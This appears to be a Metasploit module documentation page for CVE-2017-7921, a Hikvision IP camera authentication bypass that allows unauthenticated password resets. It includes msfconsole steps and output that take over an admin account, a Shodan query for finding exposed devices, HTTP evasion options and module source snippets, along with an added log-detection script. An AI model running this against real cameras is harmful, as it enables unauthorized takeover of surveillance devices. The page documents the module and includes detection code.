Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic
Module: auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
Source code: modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
Disclosure date: 2017-09-23
Last modification time: 2022-09-23 12:19:29 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-7921
Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: '"App-webs" "200 OK"'). Some of these devices can never be patched due to the vendor preventing users from upgrading the installed firmware on the affected device. This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on a vulnerable Hikvision IP Camera. This can then be utilized to gain full administrative access to the affected device.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > show targets
... a list of targets ...
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > set TARGET target-id
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > show options
... show and set options ...
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Many Hikvision IP cameras contain improper authentication logic that allows unauthenticated impersonation of any configured user account. This allows an attacker to bypass all security on the camera and gain full admin access, thereby completely controlling the camera, modifying any setting, or retrieving sensitive information.
This module allows the attacker to perform an unauthenticated password change on any vulnerable Hikvision IP Camera by utilizing the improper authentication logic: it sends a request to the server containing an auth parameter in the query string, whose value is a Base64-encoded authorization string in username:password format. Vulnerable cameras ignore the username parameter and instead use the username part of this string as the user to log in as. This can then be used to gain full administrative access to the affected device.
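The request pattern described above leaves a clear artifact in HTTP access logs (the module's own side-effect listing flags ioc-in-logs). The following is an added detection example, not code from the Metasploit module or from Hikvision: it parses constructed Common Log Format lines, looks for an auth query-string parameter, and Base64-decodes it to report which account the request tried to act as. The sample log lines, the /EXAMPLE/... paths and the severity rule are constructed assumptions; real devices expose different paths, so adapt the parsing to your proxy or camera log format.

```python
"""Flag HTTP requests that carry a Base64 'username:password' auth query parameter.

Added example for defenders; not part of the Metasploit module. Log format,
paths and IP addresses below are constructed placeholders.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Common Log Format). 'YWRtaW46dGVzdA==' is
# Base64 of 'admin:test', built for this example only.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024
10.0.0.9 - - [01/Oct/2022:10:00:02 +0000] "GET /EXAMPLE/users?auth=YWRtaW46dGVzdA== HTTP/1.1" 200 512
10.0.0.9 - - [01/Oct/2022:10:00:03 +0000] "PUT /EXAMPLE/users/1?auth=YWRtaW46dGVzdA== HTTP/1.1" 200 128
10.0.0.7 - - [01/Oct/2022:10:00:04 +0000] "GET /EXAMPLE/stream?auth=notbase64!! HTTP/1.1" 401 0
"""

# Minimal CLF parser: source address, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_auth_param(value):
    """Return the username if `value` is Base64 of 'user:secret', else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if ":" not in text:
        return None
    user, _, _secret = text.strip().partition(":")
    return user or None


def scan_log(log_text):
    """Return one finding per request whose query string holds a decodable auth value."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        for value in parse_qs(parts.query).get("auth", []):
            user = decode_auth_param(value)
            if user is None:
                continue  # not the Base64 user:password shape; ignore
            method = match.group("method")
            status = int(match.group("status"))
            # Constructed triage rule: an accepted state-changing request
            # (e.g. an account modification) is the strongest signal.
            severity = "high" if method in ("PUT", "POST") and 200 <= status < 300 else "medium"
            findings.append({
                "src": match.group("src"),
                "time": match.group("ts"),
                "method": method,
                "path": parts.path,
                "impersonated_user": user,
                "status": status,
                "severity": severity,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"[{finding['severity']}] {finding['src']} {finding['method']} "
              f"{finding['path']} as '{finding['impersonated_user']}' -> {finding['status']}")
```

Run against the embedded sample it reports two findings from 10.0.0.9 (the lookup rated medium, the accepted PUT rated high) and ignores the request whose auth value is not valid Base64. Because the password half of the decoded string is never stored or printed, the output can be forwarded to a SIEM without leaking credentials.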
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
- DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
- DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
- DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
- DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
- DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
- DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
- DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
Verification Steps
use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
set RHOSTS <TARGET HOSTS>
set RPORT <port>
set USERNAME <name of user>
set PASSWORD <new password>
check
set ID <id of user whose password you want to reset from "check" output>
run
- You should get a message that the password for the user has been successfully changed.
Options
STORE_CRED
This option allows you to store the user and password credentials in the Metasploit database for further use.
Scenarios
Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
RHOSTS => 192.168.100.180
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
PASSWORD => Pa$$W0rd
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
ID => 1
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
STORE_CRED => true
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
t
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
[*] Following users are available for password reset...
[*] USERNAME:admin | ID:1 | ROLE:Administrator
[*] USERNAME:admln | ID:2 | ROLE:Operator
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Following users are available for password reset...
[*] USERNAME:admin | ID:1 | ROLE:Administrator
[*] USERNAME:admln | ID:2 | ROLE:Operator
[*] Starting the password reset for admin...
[+] Password reset for admin was successfully completed!
[*] Please log in with your new password: Pa$$W0rd
[*] Credentials for admin were added to the database...
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.180 192.168.100.180 80/tcp (http) admin Pa$$W0rd Password
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921)
Msfconsole Usage
Here is how the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show info
Name: Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic
Module: auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-09-23
Provided by:
Monte Crypto
h00die-gr3y <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
Description:
Many Hikvision IP cameras contain improper authentication logic
which allows unauthenticated impersonation of any configured user
account. The vulnerability has been present in Hikvision products
since 2014. In addition to Hikvision-branded devices, it affects
many white-labeled camera products sold under a variety of brand
names. Hundreds of thousands of vulnerable devices are still exposed
to the Internet at the time of publishing (shodan search:
'"App-webs" "200 OK"'). Some of these devices can never be patched
due to to the vendor preventing users from upgrading the installed
firmware on the affected device. This module utilizes the bug in the
authentication logic to perform an unauthenticated password change
of any user account on a vulnerable Hikvision IP Camera. This can
then be utilized to gain full administrative access to the affected
device.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7921
https://packetstormsecurity.com/files/144097
https://ipvm.com/reports/hik-exploit
https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
https://seclists.org/fulldisclosure/2017/Sep/23
Module Options
This is a complete list of options available in the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show options
Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show advanced
Module advanced options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for
non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
.2)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS no The User-Agent header to use for all requests
X 12.2; rv:97.0) Gecko/20100101 Firef
ox/97.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 module can do:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apac
he)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apa
che)
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- No response recieved from the target!
- No users were found in the returned CSS code!
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- Target server did not respond to the password reset request
- Unknown Error. Password reset was not successful!
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
101: 'vars_get' => {
102: 'auth' => auth.strip
103: }
104: })
105: rescue StandardError => e
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
102: 'auth' => auth.strip
103: }
104: })
105: rescue StandardError => e
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
No response recieved from the target!
Here is a relevant code snippet related to the "No response recieved from the target!" error message:
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
113: xml_res = res.get_xml_document
114: print_status('Following users are available for password reset...')
115: user_array = xml_res.css('User')
116: return Exploit::CheckCode::Safe('No users were found in the returned CSS code!') if user_array.blank?
No users were found in the returned CSS code!
Here is a relevant code snippet related to the "No users were found in the returned CSS code!" error message:
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
113: xml_res = res.get_xml_document
114: print_status('Following users are available for password reset...')
115: user_array = xml_res.css('User')
116: return Exploit::CheckCode::Safe('No users were found in the returned CSS code!') if user_array.blank?
117:
118: user_array.each do |user|
119: print_status("USERNAME:#{user&.at_css('userName')&.content} | ID:#{user&.at_css('id')&.content} | ROLE:#{user&.at_css('userLevel')&.content}")
120: end
121: return Exploit::CheckCode::Vulnerable
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
141: },
142: 'ctype' => 'application/xml',
143: 'data' => post_data
144: })
145: rescue StandardError => e
146: print_error("#{peer} - Communication error occurred: #{e.message}")
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
142: 'ctype' => 'application/xml',
143: 'data' => post_data
144: })
145: rescue StandardError => e
146: print_error("#{peer} - Communication error occurred: #{e.message}")
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
152: fail_with(Failure::Unknown, 'Target server did not respond to the password reset request')
Target server did not respond to the password reset request
Here is a relevant code snippet related to the "Target server did not respond to the password reset request" error message:
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
152: fail_with(Failure::Unknown, 'Target server did not respond to the password reset request')
153: elsif res.code == 200
154: print_good("Password reset for #{datastore['USERNAME']} was successfully completed!")
155: print_status("Please log in with your new password: #{datastore['PASSWORD']}")
156: if datastore['STORE_CRED'] == true
157: report_creds
Unknown Error. Password reset was not successful!
Here is a relevant code snippet related to the "Unknown Error. Password reset was not successful!" error message:
154: print_good("Password reset for #{datastore['USERNAME']} was successfully completed!")
155: print_status("Please log in with your new password: #{datastore['PASSWORD']}")
156: if datastore['STORE_CRED'] == true
157: report_creds
158: end
159: else
160: print_error('Unknown Error. Password reset was not successful!')
161: print_status("Please check the password rules and ensure that the user account/ID:#{datastore['USERNAME']}/#{datastore['ID']} exists!")
162: end
163: end
164: end
Related Pull Requests
References
- CVE-2017-7921
- PACKETSTORM-144097
- https://ipvm.com/reports/hik-exploit
- https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
- https://seclists.org/fulldisclosure/2017/Sep/23
See Also
Check also the following modules related to this module:
- auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
- exploit/linux/http/hikvision_cve_2021_36260_blind
- exploit/linux/misc/hikvision_rtsp_bof
- auxiliary/admin/http/cfme_manageiq_evm_pass_reset
- auxiliary/admin/http/intersil_pass_reset
- auxiliary/admin/http/linksys_tmunblock_admin_reset_bof
- auxiliary/admin/http/mantisbt_password_reset
- auxiliary/admin/http/netgear_r6700_pass_reset
- auxiliary/admin/http/nuuo_nvrmini_reset
- auxiliary/admin/http/rails_devise_pass_reset
- auxiliary/admin/2wire/xslt_password_reset
- auxiliary/admin/chromecast/chromecast_reset
- auxiliary/admin/dcerpc/cve_2020_1472_zerologon
- auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/gather/coldfusion_pwd_props
- auxiliary/gather/konica_minolta_pwd_extract
- auxiliary/gather/xerox_pwd_extract
- auxiliary/scanner/http/titan_ftp_admin_pwd
- auxiliary/scanner/printer/canon_iradv_pwd_extract
- auxiliary/scanner/http/bmc_trackit_passwd_reset
- auxiliary/scanner/http/epmp1000_reset_pass
- auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Authors
- Monte Crypto
- h00die-gr3y <h00die.gr3y[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.